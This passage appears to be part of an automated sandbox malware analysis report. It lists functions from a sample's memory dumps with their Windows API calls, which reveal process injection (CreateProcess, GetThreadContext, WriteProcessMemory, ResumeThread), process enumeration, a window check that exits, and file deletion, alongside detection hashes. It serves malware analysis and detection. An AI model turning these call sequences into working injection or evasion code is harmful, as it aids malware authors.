lstrcat.KERNEL32(00000000,021426A3), ref: 021426B0
lstrcat.KERNEL32(00000000,00000000), ref: 021426C3

Strings

\AC\, xrefs: 02142683

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction ID: 38c1b7dae47614a83e49aa54762177fd083ac50318e0ac4074edeead8c48d364
Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction Fuzzy Hash: 94217A71540148EFEB129F60CC49F9DBBB4EF10704F1441A9FD58EA0A1DB308AA1DB94

Function 001C2666 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(001C2656,00000010,?,?,00000000,00000104), ref: 001C266B
lstrcat.KERNEL32(00000000,001C26A3), ref: 001C26B0
lstrcat.KERNEL32(00000000,00000000), ref: 001C26C3

Strings

\AC\, xrefs: 001C2683

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: lstrcat$EnvironmentExpandStrings
String ID: \AC\
API String ID: 2903145849-1749977576
Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction ID: e4e2971d9f5b256a87e084e92f98be58b8673f9a9e46d99b317538ee14eb21d4
Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
Instruction Fuzzy Hash: 84218B71500218EFEF129F60CC89F9DBBB4EF20704F1441A9ED54EA1A1D730CA619B64

Function 02140A1A Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,02140A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 02140A21
GetThreadContext.KERNEL32(?,00000000), ref: 02140A49
VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02140A74
DuplicateHandle.KERNEL32(000000FF,000000FF,?,021459C8,00000000,00000000,00000002), ref: 02140AB9
WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02140AE7
ResumeThread.KERNEL32(?), ref: 02140AF7
Sleep.KERNEL32(000003E8), ref: 02140B07
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02140B1E

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
String ID:
API String ID: 617592159-0
Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction ID: 44d87a40696e44dc199b1f44e565df551ce95c6a8e033ab547aaa378e9bbf21f
Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction Fuzzy Hash: F9314C71640258AFEF268F51CC85FA977B8EF08748F080198AB49FE0E5DB709690CE64

Function 001C0A1A Relevance: 12.1, APIs: 8, Instructions: 76threadsleepprocessCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,001C0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001C0A21
GetThreadContext.KERNEL32(?,00000000), ref: 001C0A49
VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A74
DuplicateHandle.KERNEL32(000000FF,000000FF,?,001C59C8,00000000,00000000,00000002), ref: 001C0AB9
WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001C0AE7
ResumeThread.KERNEL32(?), ref: 001C0AF7
Sleep.KERNEL32(000003E8), ref: 001C0B07
OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0B1E

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
String ID:
API String ID: 617592159-0
Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction ID: 2067751bc769af6727e3ef1839da84b1b4ae6cc8dc197e2e45a006881c8fd9f5
Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
Instruction Fuzzy Hash: 6E314F716402549FEF238F10CC85FA977B8EF18744F080198AA49FE0E6DB70DA90CE64

Function 02140D29 Relevance: 12.1, APIs: 8, Instructions: 64sleepprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02140D48
Sleep.KERNEL32(000003E8), ref: 02140D5E
Process32First.KERNEL32(?,00000000), ref: 02140D7E
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 02140DB3
CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 02140DC9
Process32Next.KERNEL32(?,?), ref: 02140DDF
CloseHandle.KERNEL32(?), ref: 02140E0B
Sleep.KERNEL32(000003E8), ref: 02140E16

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2496627043-0
Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction ID: 317179c7c75e7cf442f9d9013dfb3c1b0dbae3168c1e44f765070d0c0f2fa045
Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
Instruction Fuzzy Hash: 9D21AC30942114ABEF2A5F25CC54AE9B7B9AF48700F0901E9EA1DFA195CF329A94CF54

Function 001C0D29 Relevance: 12.1, APIs: 8, Instructions: 64sleepprocessCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001C0D48
Sleep.KERNEL32(000003E8), ref: 001C0D5E
Process32First.KERNEL32(?,00000000), ref: 001C0D7E
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 001C0DB3
CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 001C0DC9
Process32Next.KERNEL32(?,?), ref: 001C0DDF
CloseHandle.KERNEL32(?), ref: 001C0E0B
Sleep.KERNEL32(000003E8), ref: 001C0E16

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 2496627043-0
Opcode ID: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
Instruction ID: 724837a767e616bbb3b298c250941228e268248473bfe5bfc93ac98464869d00
Opcode Fuzzy Hash: 664d63de3b9fafb3872cc365957f5438018d784fa8db0df2d7663aaabb95b3c8
Instruction Fuzzy Hash: D1217F31911124EBEF225FA4CC54BEDB7B9AF48701F0901E9F90AEA195CB309E908F55

Function 02142A88 Relevance: 7.6, APIs: 5, Instructions: 108filesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02142A60

Part of subcall function 02142BBB: Sleep.KERNEL32(00002710), ref: 02142C2C

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02142B02
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02142B46
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02142B9C
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02142BB0

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction ID: bea3e1487998dc4f4fbab4d60ce54c6e7c5bea0830dc8d7bc39a9371bbf92a2c
Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction Fuzzy Hash: 2E3114715802559EEB326F71CC88FAB76BCAF90709F4005A9BE8DDA051DF7496C0CEA1

Function 001C2A88 Relevance: 7.6, APIs: 5, Instructions: 108filesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 001C2A60

Part of subcall function 001C2BBB: Sleep.KERNEL32(00002710), ref: 001C2C2C

DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B02
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2B46
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B9C
Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2BB0

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: DeleteFileSleep
String ID:
API String ID: 3161721237-0
Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction ID: 275fb6263abb37eef3e3e71df306651d1210d5ae5ccfddcb04249f26a9e9dd2e
Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
Instruction Fuzzy Hash: 5B310171500269AFEB266F71CC89FAB77BCAFB0704F44049DEA45DA051DF74DA80CAA1

Function 021432C2 Relevance: 7.6, APIs: 5, Instructions: 66processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 021432E6
GetStartupInfoA.KERNEL32(00000000), ref: 02143330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,021432B1,00000011,?,00000000,00A00000), ref: 0214335D
CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143369
CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143375

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
Instruction ID: 4cd5b16b65aed1705d1736721d35a9cb0c295b654d319e0244a35bd1912b05eb
Opcode Fuzzy Hash: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
Instruction Fuzzy Hash: B81103B2444514AEEF126B60CC84FAFB7FDEF40706F0544A9E999A6045DF345680CEA1

Function 001C32C2 Relevance: 7.6, APIs: 5, Instructions: 66processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
Instruction ID: c7485b42a56dfa788a16c5305a251ae6568656de49255e47a5d89b7acae85cb3
Opcode Fuzzy Hash: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
Instruction Fuzzy Hash: 581103B2404554AFEF136B60CD85FAFB7FDEF60305F0544ADE585A6045DB349A80CEA1

Function 0214328F Relevance: 7.6, APIs: 5, Instructions: 61processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 021432E6
GetStartupInfoA.KERNEL32(00000000), ref: 02143330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,021432B1,00000011,?,00000000,00A00000), ref: 0214335D
CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143369
CloseHandle.KERNEL32(?,?,021432B1,00000011,?,00000000,00A00000,00A00000,0214316A,00000004,00000000), ref: 02143375

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
Instruction ID: 2b0b92872bcc1bd77b7df1e3dd6dcfbe6762bf4904733bca868cea0daf051ec0
Opcode Fuzzy Hash: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
Instruction Fuzzy Hash: 891121B28445589EEF136B60CC84FAFB7F9EF40306F4144E9E999EA045DF305680CE91

Function 001C328F Relevance: 7.6, APIs: 5, Instructions: 61processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 001C32E6
GetStartupInfoA.KERNEL32(00000000), ref: 001C3330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C32B1,00000011,?,00000000,00A00000), ref: 001C335D
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3369
CloseHandle.KERNEL32(?,?,001C32B1,00000011,?,00000000,00A00000,00A00000,001C316A,00000004,00000000), ref: 001C3375

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
Instruction ID: ac9927580557797ac402c103fd79d00d7d15eeabf0bd26a871240790a05aac25
Opcode Fuzzy Hash: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
Instruction Fuzzy Hash: 7E111FB28045589FEF136B60CC89FAFB7F8EF60305F0144A9E985AA045DB349A80CE91

Function 02140B42 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Process$Window$ExitFindLibraryLoadOpenThread
String ID:
API String ID: 3976292551-0
Opcode ID: ce9b35de20eebca6936680f36fda4bea56ec7dc78ef505b7866e1d0899d6ccfe
Instruction ID: 07c3d123508853dca01113f4f655de642387f93dacd2774d20cb62f5208d7357
Opcode Fuzzy Hash: ce9b35de20eebca6936680f36fda4bea56ec7dc78ef505b7866e1d0899d6ccfe
Instruction Fuzzy Hash: CC11E5759843056FEB152BB18C88FAA365C9F08714F0904A6BF4CEF095EF7098418BB9

Function 001C0B42 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Process$Window$ExitFindLibraryLoadOpenThread
String ID:
API String ID: 3976292551-0
Opcode ID: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
Instruction ID: 21096797c2136e07da87d67eb28ce3356d04a0ee0ec389f9400993a79b57079d
Opcode Fuzzy Hash: 56a8e61f6a6193476798500ad3ee1a3f7e7b4d94d4c4795691a0a7dba7b7bd01
Instruction Fuzzy Hash: 6111E575944305ABEF026AB08C89FAA375C9F38704F0944AABD55EF096DB70DC41C7B5

Function 02140B68 Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(02140B61,00000007,?,00000000), ref: 02140B6D

Part of subcall function 02140CDD: GetProcAddress.KERNEL32(00000000,021404B1), ref: 02140CEA

Part of subcall function 02140BA6: FindWindowA.USER32(02140B98,0000000E), ref: 02140BAB
Part of subcall function 02140BA6: GetWindowThreadProcessId.USER32(00000000), ref: 02140BB8
Part of subcall function 02140BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 02140BC5
Part of subcall function 02140BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 02140BE7

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
String ID:
API String ID: 3081398214-0
Opcode ID: 7d0d2a55b224f60994a051d836d7d629a627f4684472feeea615a9bb8e083137
Instruction ID: 7cf0929ae1df50ac4d486775f7624933496b5ac0455d0b6a2a3dfbca9e2ae5a3
Opcode Fuzzy Hash: 7d0d2a55b224f60994a051d836d7d629a627f4684472feeea615a9bb8e083137
Instruction Fuzzy Hash: 2A01D675A843057FEF152B718C88FAE365C6F08715F0900A5BE4DEE1D6EFB084418AB8

Function 001C0B68 Relevance: 7.5, APIs: 5, Instructions: 43libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(001C0B61,00000007,?,00000000), ref: 001C0B6D

Part of subcall function 001C0CDD: GetProcAddress.KERNEL32(00000000,001C04B1), ref: 001C0CEA

Part of subcall function 001C0BA6: FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
Part of subcall function 001C0BA6: GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
Part of subcall function 001C0BA6: OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5
Part of subcall function 001C0BA6: ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Process$Window$AddressExitFindLibraryLoadOpenProcThread
String ID:
API String ID: 3081398214-0
Opcode ID: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
Instruction ID: aba8e1325fc70c5bdf08b0507d9e73b3b069cfc1834b77748dc634d74a94ba5d
Opcode Fuzzy Hash: efa8d9c2d975f273dedc56f725c716f6a4740850526463fb05e39f639ec900bd
Instruction Fuzzy Hash: 0A01D175A44305BBEF026A708C89FAE365CAF28700F0904A9BD55EE1D6DBB0CC41C6B4

Function 02141528 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(02141522,00000006,?,00000000), ref: 0214152D

Part of subcall function 02140CDD: GetProcAddress.KERNEL32(00000000,021404B1), ref: 02140CEA

Part of subcall function 02141386: VirtualProtect.KERNEL32(?,00000020,00000040,?,?,?,?,?,?,?,?,?,0214155C,02141439,00000000,02141439), ref: 021413B3
Part of subcall function 02141386: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000040,?,?,?,?,?,?,?,?,0214155C,02141439,00000000,02141439), ref: 021413C8
Part of subcall function 02141386: VirtualProtect.KERNEL32(?,00000020,?,02141434,?,?,?,?,?,?,?,?,0214155C,02141439,00000000,02141439), ref: 0214142F

Strings

p/8w, xrefs: 0214157F
-8w, xrefs: 021415CA
`/8w, xrefs: 02141566

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Virtual$Protect$AddressAllocLibraryLoadProc
String ID: `/8w$p/8w$-8w
API String ID: 2821516111-1988377448
Opcode ID: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction ID: e65ade6c102ae6075eef00eb2b9b101081450e0f56294fc1d504775b0ed55cb0
Opcode Fuzzy Hash: e7d754d995ee471e61356b6a085558e47ef38c517a54f5d661099b17a988a728
Instruction Fuzzy Hash: 4D117D72404514AEDF03AF60C5C4CAA73EDAF40718B45096A9D8DEE449EF749194CEE5

Function 02140BA6 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(02140B98,0000000E), ref: 02140BAB
GetWindowThreadProcessId.USER32(00000000), ref: 02140BB8
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 02140BC5

Part of subcall function 02140E21: VirtualAllocEx.KERNEL32(0000094C,00000000,021459C8,00003000,00000040,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E47
Part of subcall function 02140E21: WriteProcessMemory.KERNEL32(0000094C,02140000,00000000,021459C8,00000000,?,02140DC9,00000000,0000094C,00000000), ref: 02140E65
Part of subcall function 02140E21: IsWow64Process.KERNEL32(0000094C,?,?,?,02140DC9,00000000,0000094C,00000000), ref: 02140E7B

ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 02140BE7

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
String ID:
API String ID: 1790362231-0
Opcode ID: bc2bbfce36d30a6fefd0dad73d042fdf8fb168c32effb32c2ae76050913c3bbc
Instruction ID: 933868a361253e5ee509ed10fe8711ef2c6159eb8607de920da898343328322e
Opcode Fuzzy Hash: bc2bbfce36d30a6fefd0dad73d042fdf8fb168c32effb32c2ae76050913c3bbc
Instruction Fuzzy Hash: FF112775688245AFEF1527328D54F2A3B695F06714F1D00E5EA0CDF0A3DF30C90A9AB8

Function 001C0BA6 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON

Download Yara Rule

APIs

FindWindowA.USER32(001C0B98,0000000E), ref: 001C0BAB
GetWindowThreadProcessId.USER32(00000000), ref: 001C0BB8
OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000), ref: 001C0BC5

Part of subcall function 001C0E21: VirtualAllocEx.KERNELBASE(0000094C,00000000,001C59C8,00003000,00000040,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E47
Part of subcall function 001C0E21: WriteProcessMemory.KERNELBASE(0000094C,001C0000,00000000,001C59C8,00000000,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E65
Part of subcall function 001C0E21: IsWow64Process.KERNEL32(0000094C,?,?,?,001C0DC9,00000000,0000094C,00000000), ref: 001C0E7B

ExitProcess.KERNEL32(00000000,00000000,000008E2,?,00000000), ref: 001C0BE7

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWow64Write
String ID:
API String ID: 1790362231-0
Opcode ID: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
Instruction ID: 8d2a110fdadbfcb79557eef3c6f04e088fde0ec6edb1f3a929b01c2de3428793
Opcode Fuzzy Hash: 1263692a48715f6abef1e836abde3d8c1e86dad40dcc785cb29634c96280c8d8
Instruction Fuzzy Hash: 5F11C465649241AEEF1367708D55F6A3B695F36700F1941DDF8149E0A3DB60CC02D678

Function 021426CD Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 021426E8
GetFileSize.KERNEL32(?,00000000), ref: 02142701
ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 02142722
CloseHandle.KERNEL32(?), ref: 02142733

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: b7d2a57123e67cbd1f37554cf7139a6097d3d890f97c631bd6fa19753a851766
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: 8E01E830640209BBEF119F60CC46F9DBAB8AF10B45F2041A9BE18F91E0DB70A661DA18

Function 001C26CD Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 001C26E8
GetFileSize.KERNEL32(?,00000000), ref: 001C2701
ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 001C2722
CloseHandle.KERNEL32(?), ref: 001C2733

Memory Dump Source

Source File: 0000001E.00000002.2599119116.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_1c0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: 1b7016d98d2ac921908da5a69b0d089c21a15c5119871dbff96ca870c68476b5
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: 9D01EC30640309BBEF119F60CC8AF9D7AB4AF20B44F1041A9EA14F91E0D770AA619A18

Function 02142740 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 0214275C
SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 02142779
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02142795
CloseHandle.KERNEL32(?), ref: 021427A6

Memory Dump Source

Source File: 0000001E.00000002.2599829567.0000000002140000.00000040.00000400.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_2140000_bin.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: 3152cfd918847eea9f15cbb022346a35c703c1caae71cc56eea7665c69851af8
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
